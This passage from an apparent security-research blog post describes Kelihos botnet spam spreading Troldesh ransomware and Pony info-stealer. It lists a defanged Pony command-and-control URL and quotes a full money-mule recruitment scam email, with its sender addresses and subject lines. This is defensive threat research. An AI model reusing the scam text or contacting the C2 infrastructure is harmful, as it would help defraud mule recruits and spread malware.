The above is a plain text version of the ransom note. As it can be seen, a Gmail address is being use, which is one of its kind behavior.

Troldesh did not stop trolling the victim there, it downloads the PONY malware and contacts its command and control center at this location:

 hxxp://ipieceofcake[dot]com/wp-content/uploads/2016/04/gate[dot]php

When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The files eventually encrypt the system but it also downloads the Pony malware to steal all the information from the victim's computer. Hence, causing a double blow to the victim.

Money Mule Spam 

Kelihos botnet was not in a mood to stop. It also sent Money Mule spam geo-targeting users with the ".us" United States email address. It impersonated a company from 'China looking for employees'. 

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
.
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

Subject - Job opportunity - marquerite23894@aol[dot]com
Subject - Open vacancy - marquerite23894@aol[dot]com

The other thing to note is that all of the email addresses use AOL domains, which is a unique thing in itself.


To conclude, Kelihos has been surprising the researchers quite often and it has become necessary to keep track of different activities of the botnet. The ransomware inclusion brings interesting twists from the research as well as law enforcement. Another thing that I found while searching for NoMoreRansom was a group established by key leaders in the community to fight against the rise of ransomware. 

So is the extension of NoMoreRansom a challenge to the people fighting it? Who knows? 
FYI: Things are about to get interesting!